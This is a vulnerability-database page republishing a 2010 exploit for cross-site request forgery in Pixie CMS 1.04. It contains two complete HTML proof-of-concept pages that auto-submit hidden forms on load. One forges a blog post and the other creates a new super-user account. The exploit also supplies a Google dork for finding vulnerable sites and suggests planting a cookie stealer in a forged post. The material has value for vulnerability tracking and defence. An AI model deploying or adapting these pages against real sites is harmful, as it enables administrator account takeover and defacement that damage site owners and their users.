Vulners
Lucene search
Pixie 1.04 Cross Site Request Forgery
`Pixie 1.04 suffers from CSRF where form data can be submitted by the
admin unwittingly in this example to add a blog post or Add a new user.
It was not tempted but it is possible to include a cookie stealer in the
blog post which a naive admin my view if it has a curious/innocent
sounding name.
Here are the samples:
<html>
<!--
# Exploit Title: PiXie CMS v1.04 <= CSRF Add Post
# Google Dork: allintext: "Pixie Powered"
# Date: 28/12/2010
# Author: Ali Raheem (AKA wolfmankurd)
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip
# Version: <=1.04
# Tested on: Linux sheevaplug-debian 2.6.32-00007-g56678ec #1 PREEMPT
Mon Feb 8 03:49:55 PST 2010 armv5tel GNU/Linux
# Note: Replace SITE_AND_PATH
Have a look at the form and set title, content, tags and Author to
whatever you want.
-->
<head></head>
<body onload='document.pwn.submit()'>
<form accept-charset="UTF-8"
action="http://SITE_AND_PATH/admin/?s=publish&m=dynamic&x=blog&page=1"
method="post" name="pwn" id="form_addedit" class="form">
<input type="hidden"name="table_name" value="pixie_dynamic_posts"/>
<input type="hidden" class="form_text" name="post_id" value=""
maxlength="11" />
<input type="hidden" class="form_text" name="page_id" value="3"
maxlength="11" />
<input type="hidden" id="date" name="day" value="28">
<input type="hidden" name="month" value="12">
<input type="hidden" name="year" value="2010">
<input type="hidden" class="form_text" name="time" value="16:06"
size="5" maxlength="5" />
<input type="hidden" class="form_text" name="title" id="title"
value="PwnT" />
<input type="hidden" name="content" id="content" cols="50" value="PwnT
by CSRF">
<input type="hidden" class="form_text" name="tags" id="tags" value="Hack"/>
<input type="hidden" name="public" id="public" value="yes" />
<input type="hidden" type="radio" name="comments" id="comments"
value="yes" />
<input type="hidden" class="form_text" name="author" value="AUTHOR"
maxlength="64" />
<input type="hidden" class="form_text" name="last_modified"
value="20101228160628" />
<input type="hidden" class="form_text" name="post_views" value=""
maxlength="99" />
<input type="hidden" class="form_text" name="post_slug" value=""
maxlength="255" />
<input type="hidden" name="submit_new" class="submit" value="Save"
type="submit"/>
</form>
</body>
</html>
And
<html>
<!--
# Exploit Title: PiXie CMS v1.04 <= CSRF Add Super User
# Google Dork: allintext: "Pixie Powered"
# Date: 28/12/2010
# Author: Ali Raheem (AKA wolfmankurd)
# Software Link: http://pixie-cms.googlecode.com/files/pixie_v1.04.zip
# Version: <=1.04
# Tested on: Linux sheevaplug-debian 2.6.32-00007-g56678ec #1 PREEMPT
Mon Feb 8 03:49:55 PST 2010 armv5tel GNU/Linux
Note : Repace site and path,
USERNAME no spaces,
REALNAME with a name,
EMAIL with a valid email you get login details
-->
<head></head>
<body onload='document.pwn.submit()'>
<form accept-charset="UTF-8"
action="http://SITEANDPATH/admin/?s=settings&x=users" method="post"
class="form" name="pwn">
<input type="hidden" name="uname" id="uname" value="USERNAME"/>
<!-- No Spaces!-->
<input type="hidden" name="realname" id="realname" value="REALNAME"/>
<input type="hidden" name="email" id="email" value="EMAIL"/>
<!-- needs to be Valid-->
<input type="hidden" name="user_new" value="Save"/>
<input type="hidden" name="privilege" value="2" />
</form>
</body>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Dec 2010 00:00Current
0.7Low risk
Vulners AI Score0.7